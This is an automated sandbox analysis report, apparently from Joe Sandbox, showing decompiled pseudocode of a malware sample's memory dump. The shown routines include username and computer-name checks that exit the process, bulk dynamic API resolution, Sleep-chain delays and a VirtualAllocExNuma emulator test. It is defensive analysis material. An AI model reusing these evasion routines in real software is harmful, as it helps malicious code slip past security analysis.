                                                                    • String ID: %08lX%04lX%lu-$:\$C$QuBi
                                                                    • API String ID: 3500232521-1320645344
                                                                    • Opcode ID: 8859b93e367feb201de391189b91548d1d21cf734e1c7d35d70a12964ce6d76e
                                                                    • Instruction ID: 7800caf5788651b07f2932c072cb6ae7bb44dd8327f48545f3071958f15c93b2
                                                                    • Opcode Fuzzy Hash: 8859b93e367feb201de391189b91548d1d21cf734e1c7d35d70a12964ce6d76e
                                                                    • Instruction Fuzzy Hash: B471C5B19011689FDB21EB65CD80BDDBBB8AF99304F0400EEE949B3241D6745F85CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E0040BE20(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
                                                                    				signed int _t8;
                                                                    				intOrPtr _t10;
                                                                    				intOrPtr _t17;
                                                                    				intOrPtr _t20;
                                                                    				signed int _t25;
                                                                    				void* _t27;
                                                                    
                                                                    				_t24 = __esi;
                                                                    				_t23 = __edi;
                                                                    				_t16 = __ebx;
                                                                    				_t25 = _t27 - 0x8c;
                                                                    				_t8 =  *0x443674; // 0x393162b1
                                                                    				 *(_t25 + 0x88) = _t8 ^ _t25;
                                                                    				_t10 = E0041522A(__ebx, __edx, __edi, __esi);
                                                                    				_t17 =  *0x44606c; // 0x4c92f20
                                                                    				_t22 = _t10;
                                                                    				if(E00415EA0(_t17, _t10) == 0) {
                                                                    					 *(_t25 - 0x80) = 0x101;
                                                                    					GetUserNameA(_t25 - 0x7c, _t25 - 0x80);
                                                                    					_t20 =  *0x4461ac; // 0x4c92f30
                                                                    					_t22 = _t25 - 0x7c;
                                                                    					_t11 = E00415EA0(_t20, _t25 - 0x7c);
                                                                    					if(_t11 == 0) {
                                                                    						ExitProcess(_t11);
                                                                    					}
                                                                    				}
                                                                    				return E0041DA9B(_t11, _t16,  *(_t25 + 0x88) ^ _t25, _t22, _t23, _t24);
                                                                    			}










                                                                    APIs
                                                                      • Part of subcall function 0041522A: GetComputerNameA.KERNEL32 ref: 00415259
                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 0040BE60
                                                                    • ExitProcess.KERNEL32 ref: 0040BE79
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Name$ComputerExitProcessUser
                                                                    • String ID:
                                                                    • API String ID: 162832415-0
                                                                    • Opcode ID: be9637f4022ce577b140ca62154b0ad0eb56bcbc75323027480c01ab5958bc33
                                                                    • Instruction ID: d3f0cd800ad9897325274bc7e6462560b5c94c1e503cd198cb921ca5e59d3afa
                                                                    • Opcode Fuzzy Hash: be9637f4022ce577b140ca62154b0ad0eb56bcbc75323027480c01ab5958bc33
                                                                    • Instruction Fuzzy Hash: 04F06274900208CBDB20EFB0EC44ADE77B9BB5A308F40842EDC09D7241FF7895488B99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E00414F0E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr* _t13;
                                                                    				void* _t22;
                                                                    				void* _t23;
                                                                    				void* _t25;
                                                                    				void* _t26;
                                                                    
                                                                    				_t26 = __eflags;
                                                                    				_t24 = __esi;
                                                                    				_t23 = __edi;
                                                                    				_t22 = __edx;
                                                                    				_t18 = __ebx;
                                                                    				_push(0x4c);
                                                                    				E0042083E(E0043475A, __ebx, __edi, __esi);
                                                                    				 *(_t25 - 0x30) =  *(_t25 - 0x30) & 0x00000000;
                                                                    				GetSystemInfo(_t25 - 0x54); // executed
                                                                    				_t13 = E00415F45(__ebx, _t25 - 0x2c, _t22, __edi, __esi, _t26,  *((intOrPtr*)(_t25 - 0x40))); // executed
                                                                    				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                    				if( *((intOrPtr*)(_t13 + 0x14)) >= 0x10) {
                                                                    					_t13 =  *_t13;
                                                                    				}
                                                                    				E004042A9(_t23, _t13);
                                                                    				E00404354(_t25 - 0x2c, 1, 0);
                                                                    				return E00420888(_t18, _t23, _t24);
                                                                    			}









                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00414F15
                                                                    • GetSystemInfo.KERNELBASE(?,0000004C,0040B8F9,00000001,00000000), ref: 00414F22
                                                                      • Part of subcall function 00415F45: __EH_prolog3_GS.LIBCMT ref: 00415F4F
                                                                      • Part of subcall function 00415F45: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00416052
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3_$InfoIos_base_dtorSystemstd::ios_base::_
                                                                    • String ID:
                                                                    • API String ID: 881831149-0
                                                                    • Opcode ID: aa459c087e0cc634c01cf06471d7fe6fbe510b168132e119c4a5861d44a15a1f
                                                                    • Instruction ID: 00775680f408d1f54713e91b73b6090a145a6d657ab252316799370099833476
                                                                    • Opcode Fuzzy Hash: aa459c087e0cc634c01cf06471d7fe6fbe510b168132e119c4a5861d44a15a1f
                                                                    • Instruction Fuzzy Hash: 87F03971A10108DBEF44FBA5D946BEC7375EB89305F80406AF211AA1D2CB7C5949CB6A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 100%
                                                                    			E00418B05() {
                                                                    				struct HINSTANCE__* _t1;
                                                                    				struct HINSTANCE__* _t2;
                                                                    				struct HINSTANCE__* _t3;
                                                                    				struct HINSTANCE__* _t4;
                                                                    				struct HINSTANCE__* _t5;
                                                                    				struct HINSTANCE__* _t6;
                                                                    				struct HINSTANCE__* _t8;
                                                                    				struct HINSTANCE__* _t9;
                                                                    				struct HINSTANCE__* _t11;
                                                                    				struct HINSTANCE__* _t12;
                                                                    				struct HINSTANCE__* _t13;
                                                                    				struct HINSTANCE__* _t14;
                                                                    				struct HINSTANCE__* _t15;
                                                                    				struct HINSTANCE__* _t16;
                                                                    				struct HINSTANCE__* _t17;
                                                                    				struct HINSTANCE__* _t18;
                                                                    				struct HINSTANCE__* _t19;
                                                                    				struct HINSTANCE__* _t20;
                                                                    				struct HINSTANCE__* _t21;
                                                                    				struct HINSTANCE__* _t22;
                                                                    				struct HINSTANCE__* _t23;
                                                                    				struct HINSTANCE__* _t24;
                                                                    				_Unknown_base(*)()* _t32;
                                                                    
                                                                    				_t1 =  *0x446474; // 0x76ff0000
                                                                    				if(_t1 != 0) {
                                                                    					 *0x446460 = GetProcAddress(_t1,  *0x445a70);
                                                                    					 *0x4464e0 = GetProcAddress( *0x446474,  *0x445a78);
                                                                    					 *0x446448 = GetProcAddress( *0x446474,  *0x445af0);
                                                                    					 *0x44631c = GetProcAddress( *0x446474,  *0x445ff4);
                                                                    					 *0x446314 = GetProcAddress( *0x446474,  *0x446060);
                                                                    					 *0x4463c0 = GetProcAddress( *0x446474,  *0x445e00);
                                                                    					 *0x4464d0 = GetProcAddress( *0x446474,  *0x445ae0);
                                                                    					 *0x44640c = GetProcAddress( *0x446474,  *0x445d0c);
                                                                    					 *0x446484 = GetProcAddress( *0x446474,  *0x4460e8);
                                                                    					 *0x4462bc = GetProcAddress( *0x446474,  *0x446070);
                                                                    					 *0x446498 = GetProcAddress( *0x446474,  *0x446048);
                                                                    					 *0x4463e4 = GetProcAddress( *0x446474,  *0x4461b4);
                                                                    					 *0x4462c0 = GetProcAddress( *0x446474,  *0x445c6c);
                                                                    					 *0x4463bc = GetProcAddress( *0x446474,  *0x445f10);
                                                                    					 *0x446320 = GetProcAddress( *0x446474,  *0x445eac);
                                                                    					 *0x446300 = GetProcAddress( *0x446474,  *0x445f38);
                                                                    					 *0x4464d4 = GetProcAddress( *0x446474,  *0x445a6c);
                                                                    					 *0x44629c = GetProcAddress( *0x446474,  *0x4460a4);
                                                                    					 *0x4464e8 = GetProcAddress( *0x446474,  *0x445f24);
                                                                    					 *0x446340 = GetProcAddress( *0x446474,  *0x445fc4);
                                                                    					 *0x4462b0 = GetProcAddress( *0x446474,  *0x445c68);
                                                                    					 *0x4463f0 = GetProcAddress( *0x446474,  *0x445eb4);
                                                                    					 *0x4463a0 = GetProcAddress( *0x446474,  *0x445da0);
                                                                    					 *0x4462d4 = GetProcAddress( *0x446474,  *0x445b14);
                                                                    					 *0x446268 = GetProcAddress( *0x446474,  *0x445bbc);
                                                                    					 *0x4464e4 = GetProcAddress( *0x446474,  *0x445d54);
                                                                    					 *0x4462f4 = GetProcAddress( *0x446474,  *0x445e58);
                                                                    					 *0x44639c = GetProcAddress( *0x446474,  *0x445bdc);
                                                                    					 *0x446418 = GetProcAddress( *0x446474,  *0x445e90);
                                                                    					 *0x446274 = GetProcAddress( *0x446474,  *0x445f60);
                                                                    					 *0x4464b8 = GetProcAddress( *0x446474,  *0x446194);
                                                                    					 *0x4464d8 = GetProcAddress( *0x446474,  *0x445fa4);
                                                                    					 *0x4462d0 = GetProcAddress( *0x446474,  *0x445d90);
                                                                    					 *0x44632c = GetProcAddress( *0x446474,  *0x445a74);
                                                                    					 *0x4462a0 = GetProcAddress( *0x446474,  *0x445df8);
                                                                    					 *0x4462d8 = GetProcAddress( *0x446474,  *0x445f00);
                                                                    					 *0x4464b0 = GetProcAddress( *0x446474,  *0x445b6c);
                                                                    					 *0x4463cc = GetProcAddress( *0x446474,  *0x445cbc);
                                                                    					 *0x4463b0 = GetProcAddress( *0x446474,  *0x445c1c);
                                                                    					 *0x446464 = GetProcAddress( *0x446474,  *0x44605c);
                                                                    					 *0x446328 = GetProcAddress( *0x446474,  *0x445fcc);
                                                                    					 *0x446378 = GetProcAddress( *0x446474,  *0x445b98);
                                                                    					 *0x44626c = GetProcAddress( *0x446474,  *0x445adc);
                                                                    					 *0x446438 = GetProcAddress( *0x446474,  *0x445a5c);
                                                                    					 *0x446424 = GetProcAddress( *0x446474,  *0x445e20);
                                                                    					 *0x4463e0 = GetProcAddress( *0x446474,  *0x445e18);
                                                                    					 *0x4464bc = GetProcAddress( *0x446474,  *0x445a60);
                                                                    					 *0x4462ac = GetProcAddress( *0x446474,  *0x445b34);
                                                                    					 *0x4463b8 = GetProcAddress( *0x446474,  *0x445b88);
                                                                    					 *0x4462f8 = GetProcAddress( *0x446474,  *0x4460c8);
                                                                    					 *0x4462b4 = GetProcAddress( *0x446474,  *0x446024);
                                                                    					 *0x446494 = GetProcAddress( *0x446474,  *0x446120);
                                                                    					 *0x446288 = GetProcAddress( *0x446474,  *0x4461d0);
                                                                    					 *0x446410 = GetProcAddress( *0x446474,  *0x445c84);
                                                                    					 *0x44646c = GetProcAddress( *0x446474,  *0x445de8);
                                                                    					 *0x4462dc = GetProcAddress( *0x446474,  *0x445b38);
                                                                    					 *0x4463b4 = GetProcAddress( *0x446474,  *0x445ba4);
                                                                    					 *0x44630c = GetProcAddress( *0x446474,  *0x446050);
                                                                    					 *0x44625c = GetProcAddress( *0x446474,  *0x445dd4);
                                                                    				}
                                                                    				_t2 = LoadLibraryA( *0x445d14); // executed
                                                                    				 *0x44643c = _t2; // executed
                                                                    				_t3 = LoadLibraryA( *0x445bc8); // executed
                                                                    				 *0x446348 = _t3; // executed
                                                                    				_t4 = LoadLibraryA( *0x445ce0); // executed
                                                                    				 *0x4462e8 = _t4; // executed
                                                                    				_t5 = LoadLibraryA( *0x445b18); // executed
                                                                    				 *0x446390 = _t5; // executed
                                                                    				_t6 = LoadLibraryA( *0x4460d0); // executed
                                                                    				 *0x446384 = _t6;
                                                                    				 *0x4464ac = LoadLibraryA( *0x445aac); // executed
                                                                    				_t8 = LoadLibraryA( *0x445c30); // executed
                                                                    				 *0x44635c = _t8; // executed
                                                                    				_t9 = LoadLibraryA( *0x445c18); // executed
                                                                    				 *0x4464a0 = _t9;
                                                                    				 *0x446374 = LoadLibraryA( *0x445fd0); // executed
                                                                    				_t11 = LoadLibraryA( *0x445ecc); // executed
                                                                    				 *0x446490 = _t11; // executed
                                                                    				_t12 = LoadLibraryA( *0x445d7c); // executed
                                                                    				 *0x44634c = _t12;
                                                                    				_t13 =  *0x44643c; // 0x73bd0000
                                                                    				if(_t13 != 0) {
                                                                    					 *0x44636c = GetProcAddress(_t13,  *0x445afc);
                                                                    					 *0x446420 = GetProcAddress( *0x44643c,  *0x44611c);
                                                                    					 *0x446318 = GetProcAddress( *0x44643c,  *0x445f18);
                                                                    					 *0x4462f0 = GetProcAddress( *0x44643c,  *0x445d4c);
                                                                    					 *0x4462cc = GetProcAddress( *0x44643c,  *0x445f30);
                                                                    					 *0x446470 = GetProcAddress( *0x44643c,  *0x445ab8);
                                                                    				}
                                                                    				_t14 =  *0x446348; // 0x76620000
                                                                    				if(_t14 != 0) {
                                                                    					 *0x446330 = GetProcAddress(_t14,  *0x445d3c);
                                                                    					 *0x446264 = GetProcAddress( *0x446348,  *0x445b28);
                                                                    					 *0x4463e8 = GetProcAddress( *0x446348,  *0x445ac4);
                                                                    				}
                                                                    				_t15 =  *0x446260; // 0x76ef0000
                                                                    				if(_t15 != 0) {
                                                                    					 *0x446350 = GetProcAddress(_t15,  *0x4460b8);
                                                                    					 *0x446334 = GetProcAddress( *0x446260,  *0x445f48);
                                                                    					 *0x4463d8 = GetProcAddress( *0x446260,  *0x445b8c);
                                                                    					 *0x4464b4 = GetProcAddress( *0x446260,  *0x446154);
                                                                    					 *0x446270 = GetProcAddress( *0x446260,  *0x445d30);
                                                                    					 *0x44647c = GetProcAddress( *0x446260,  *0x445c20);
                                                                    					 *0x446310 = GetProcAddress( *0x446260,  *0x445fdc);
                                                                    					 *0x446354 = GetProcAddress( *0x446260,  *0x445fb0);
                                                                    					 *0x446278 = GetProcAddress( *0x446260,  *0x446128);
                                                                    					 *0x4464c8 = GetProcAddress( *0x446260,  *0x4461cc);
                                                                    					 *0x446478 = GetProcAddress( *0x446260,  *0x445f50);
                                                                    					 *0x446338 = GetProcAddress( *0x446260,  *0x446018);
                                                                    					 *0x4463a4 = GetProcAddress( *0x446260,  *0x445d9c);
                                                                    					 *0x446450 = GetProcAddress( *0x446260,  *0x445c00);
                                                                    					 *0x4462c8 = GetProcAddress( *0x446260,  *0x4460f0);
                                                                    				}
                                                                    				_t16 =  *0x4462e8; // 0x6f8c0000
                                                                    				if(_t16 != 0) {
                                                                    					 *0x446360 = GetProcAddress(_t16,  *0x445c54);
                                                                    					 *0x446388 = GetProcAddress( *0x4462e8,  *0x445f7c);
                                                                    					 *0x446444 = GetProcAddress( *0x4462e8,  *0x445f68);
                                                                    					 *0x4464c4 = GetProcAddress( *0x4462e8,  *0x445f3c);
                                                                    					 *0x446480 = GetProcAddress( *0x4462e8,  *0x445c64);
                                                                    					 *0x446364 = GetProcAddress( *0x4462e8,  *0x445e88);
                                                                    					 *0x446294 = GetProcAddress( *0x4462e8,  *0x446108);
                                                                    					 *0x4464dc = GetProcAddress( *0x4462e8,  *0x445dc8);
                                                                    					 *0x4463a8 = GetProcAddress( *0x4462e8,  *0x446188);
                                                                    					 *0x446368 = GetProcAddress( *0x4462e8,  *0x445c7c);
                                                                    					 *0x446258 = GetProcAddress( *0x4462e8,  *0x445e60);
                                                                    					 *0x446344 = GetProcAddress( *0x4462e8,  *0x44616c);
                                                                    					 *0x446304 = GetProcAddress( *0x4462e8,  *0x446104);
                                                                    				}
                                                                    				_t17 =  *0x446390; // 0x75220000
                                                                    				if(_t17 != 0) {
                                                                    					 *0x4462c4 = GetProcAddress(_t17,  *0x445c78);
                                                                    					 *0x4462a4 = GetProcAddress( *0x446390,  *0x44602c);
                                                                    					 *0x446284 = GetProcAddress( *0x446390,  *0x445cb8);
                                                                    					 *0x446440 = GetProcAddress( *0x446390,  *0x445ff8);
                                                                    					 *0x4463dc = GetProcAddress( *0x446390,  *0x445ebc);
                                                                    					 *0x446370 = GetProcAddress( *0x446390,  *0x445bb0);
                                                                    					 *0x446358 = GetProcAddress( *0x446390,  *0x44619c);
                                                                    				}
                                                                    				_t18 =  *0x446384; // 0x76990000
                                                                    				if(_t18 != 0) {
                                                                    					 *0x4462e0 = GetProcAddress(_t18,  *0x445ec4);
                                                                    					 *0x446430 = GetProcAddress( *0x446384,  *0x445d08);
                                                                    					 *0x44644c = GetProcAddress( *0x446384,  *0x446168);
                                                                    					 *0x446394 = GetProcAddress( *0x446384,  *0x445b74);
                                                                    					 *0x446290 = GetProcAddress( *0x446384,  *0x445dd0);
                                                                    				}
                                                                    				_t19 =  *0x4464ac; // 0x76d60000
                                                                    				if(_t19 != 0) {
                                                                    					 *0x446280 = GetProcAddress(_t19,  *0x44601c);
                                                                    					 *0x44642c = GetProcAddress( *0x4464ac,  *0x445dec);
                                                                    					 *0x4463f8 = GetProcAddress( *0x4464ac,  *0x44600c);
                                                                    					 *0x44628c = GetProcAddress( *0x4464ac,  *0x446054);
                                                                    					 *0x4464a8 = GetProcAddress( *0x4464ac,  *0x44604c);
                                                                    					 *0x44627c = GetProcAddress( *0x4464ac,  *0x445d04);
                                                                    					 *0x446404 = GetProcAddress( *0x4464ac,  *0x445f2c);
                                                                    					 *0x4464c0 = GetProcAddress( *0x4464ac,  *0x445c90);
                                                                    					 *0x4464cc = GetProcAddress( *0x4464ac,  *0x445d6c);
                                                                    					 *0x446468 = GetProcAddress( *0x4464ac,  *0x445eec);
                                                                    					 *0x44649c = GetProcAddress( *0x4464ac,  *0x445d78);
                                                                    				}
                                                                    				_t20 =  *0x44635c; // 0x76980000
                                                                    				if(_t20 != 0) {
                                                                    					 *0x446454 = GetProcAddress(_t20,  *0x445d98);
                                                                    					 *0x4462b8 = GetProcAddress( *0x44635c,  *0x445f78);
                                                                    					 *0x4463ac = GetProcAddress( *0x44635c,  *0x446038);
                                                                    				}
                                                                    				_t21 =  *0x4464a0; // 0x73d80000
                                                                    				if(_t21 != 0) {
                                                                    					 *0x44648c = GetProcAddress(_t21,  *0x445d60);
                                                                    					 *0x446380 = GetProcAddress( *0x4464a0,  *0x445ab0);
                                                                    					 *0x446408 = GetProcAddress( *0x4464a0,  *0x445c70);
                                                                    				}
                                                                    				_t22 =  *0x446374; // 0x752a0000
                                                                    				if(_t22 != 0) {
                                                                    					 *0x4464ec = GetProcAddress(_t22,  *0x445d40);
                                                                    					 *0x446324 = GetProcAddress( *0x446374,  *0x445ae8);
                                                                    					 *0x446458 = GetProcAddress( *0x446374,  *0x445b84);
                                                                    					 *0x4463ec = GetProcAddress( *0x446374,  *0x445c58);
                                                                    					 *0x4462a8 = GetProcAddress( *0x446374,  *0x446098);
                                                                    					 *0x4462e4 = GetProcAddress( *0x446374,  *0x445fa0);
                                                                    				}
                                                                    				_t23 =  *0x446490; // 0x6aca0000
                                                                    				if(_t23 != 0) {
                                                                    					 *0x446398 = GetProcAddress(_t23,  *0x445e48);
                                                                    				}
                                                                    				_t24 =  *0x44634c; // 0x72860000
                                                                    				if(_t24 != 0) {
                                                                    					 *0x4462ec = GetProcAddress(_t24,  *0x445dbc);
                                                                    					 *0x44633c = GetProcAddress( *0x44634c,  *0x445c94);
                                                                    					 *0x4463f4 = GetProcAddress( *0x44634c,  *0x445cf4);
                                                                    					 *0x446434 = GetProcAddress( *0x44634c,  *0x445b4c);
                                                                    					 *0x446414 = GetProcAddress( *0x44634c,  *0x445ef4);
                                                                    					 *0x4463c8 = GetProcAddress( *0x44634c,  *0x4461bc);
                                                                    					 *0x446308 = GetProcAddress( *0x44634c,  *0x445d68);
                                                                    					_t32 = GetProcAddress( *0x44634c,  *0x4461b0);
                                                                    					 *0x446488 = _t32;
                                                                    					return _t32;
                                                                    				}
                                                                    				return _t24;
                                                                    			}


























                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 2238633743-0
                                                                    • Opcode ID: a2d0c7020d3266b7e4a783091849d84f9ed4c48d3cd2ed840726ac96a6f100ca
                                                                    • Instruction ID: afe7283565e5c522078a5471bf4a1ea0c68b99f3e1df7f8acb02aca9803f8e8f
                                                                    • Opcode Fuzzy Hash: a2d0c7020d3266b7e4a783091849d84f9ed4c48d3cd2ed840726ac96a6f100ca
                                                                    • Instruction Fuzzy Hash: CC72B5BD401A81EFEB029F60FD498247BB6F70BB127128176E95582232D7774864EF1E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 100%
                                                                    			E0040BE94(void* __ebx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
                                                                    				void* __esi;
                                                                    				void* _t10;
                                                                    				void* _t11;
                                                                    				long _t14;
                                                                    				void* _t15;
                                                                    
                                                                    				_t15 = __eflags;
                                                                    				_t12 = __edi;
                                                                    				_t11 = __edx;
                                                                    				_t9 = __ebx;
                                                                    				Sleep(0x10); // executed
                                                                    				Sleep(0x10); // executed
                                                                    				Sleep(0x10);
                                                                    				Sleep(0x10);
                                                                    				Sleep(0x10);
                                                                    				E0040107B();
                                                                    				E0041899F();
                                                                    				_t14 = 0x13;
                                                                    				Sleep(Sleep); // executed
                                                                    				Sleep(Sleep); // executed
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				E0040BE20(__ebx, _t11, __edi, _t14, _t15);
                                                                    				Sleep(Sleep); // executed
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				E0040BE20(__ebx, _t11, __edi, _t14, _t15);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				E0040BE20(_t9, _t11, _t12, _t14, _t15);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				E00401000(_t10);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(Sleep);
                                                                    				Sleep(_t14); // executed
                                                                    				E0040B7EC(_t11, __fp0); // executed
                                                                    				return 0;
                                                                    			}









                                                                    APIs
                                                                    • Sleep.KERNELBASE(00000010), ref: 0040BE9D
                                                                    • Sleep.KERNELBASE(00000010), ref: 0040BEA1
                                                                    • Sleep.KERNEL32(00000010), ref: 0040BEA5
                                                                    • Sleep.KERNEL32(00000010), ref: 0040BEA9
                                                                    • Sleep.KERNEL32(00000010), ref: 0040BEAD
                                                                      • Part of subcall function 0041899F: LoadLibraryA.KERNEL32(0040BEB9), ref: 004189A5
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32(00000000,77006490), ref: 004189C6
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 004189D9
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 004189FF
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A16
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A2D
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A44
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A5B
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A72
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418A89
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418AA0
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418AB7
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32 ref: 00418ACE
                                                                      • Part of subcall function 0041899F: LoadLibraryA.KERNELBASE ref: 00418AE0
                                                                      • Part of subcall function 0041899F: GetProcAddress.KERNEL32(00000000), ref: 00418AF6
                                                                    • Sleep.KERNELBASE(00000013), ref: 0040BEBD
                                                                    • Sleep.KERNELBASE(00000013), ref: 0040BEC4
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BECB
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BED2
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BED9
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BEE0
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BEE7
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BEEE
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BEF5
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BEFC
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF03
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF0A
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF11
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF18
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF1F
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF26
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF2D
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF34
                                                                      • Part of subcall function 0040BE20: GetUserNameA.ADVAPI32(?,?), ref: 0040BE60
                                                                      • Part of subcall function 0040BE20: ExitProcess.KERNEL32 ref: 0040BE79
                                                                    • Sleep.KERNELBASE(00000013), ref: 0040BF40
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF47
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF4E
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF55
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF5C
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF63
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF6A
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF71
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF78
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF7F
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF86
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF8D
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF94
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BF9B
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFA2
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFA9
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFB5
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFBC
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFC8
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFCF
                                                                      • Part of subcall function 00401000: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,?,?,-5D2021DD,-5D2011DF,000000D5), ref: 00401014
                                                                      • Part of subcall function 00401000: VirtualAllocExNuma.KERNELBASE(00000000,?,?,?,?,-5D2021DD,-5D2011DF,000000D5), ref: 0040101B
                                                                      • Part of subcall function 00401000: ExitProcess.KERNEL32 ref: 00401026
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFDB
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFE2
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFE9
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFF0
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFF7
                                                                    • Sleep.KERNEL32(00000013), ref: 0040BFFE
                                                                      • Part of subcall function 0040B7EC: lstrcatA.KERNEL32(?,00000000), ref: 0040B896
                                                                      • Part of subcall function 0040B7EC: lstrcatA.KERNEL32(?,00000000,00000001,00000000), ref: 0040B8D4
                                                                      • Part of subcall function 0040B7EC: lstrcatA.KERNEL32(?,00000000,00000001,00000000), ref: 0040B912
                                                                      • Part of subcall function 0040B7EC: OpenEventA.KERNEL32(001F0003,00000000,?,00000001,00000000), ref: 0040B951
                                                                      • Part of subcall function 0040B7EC: CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 0040B96B
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
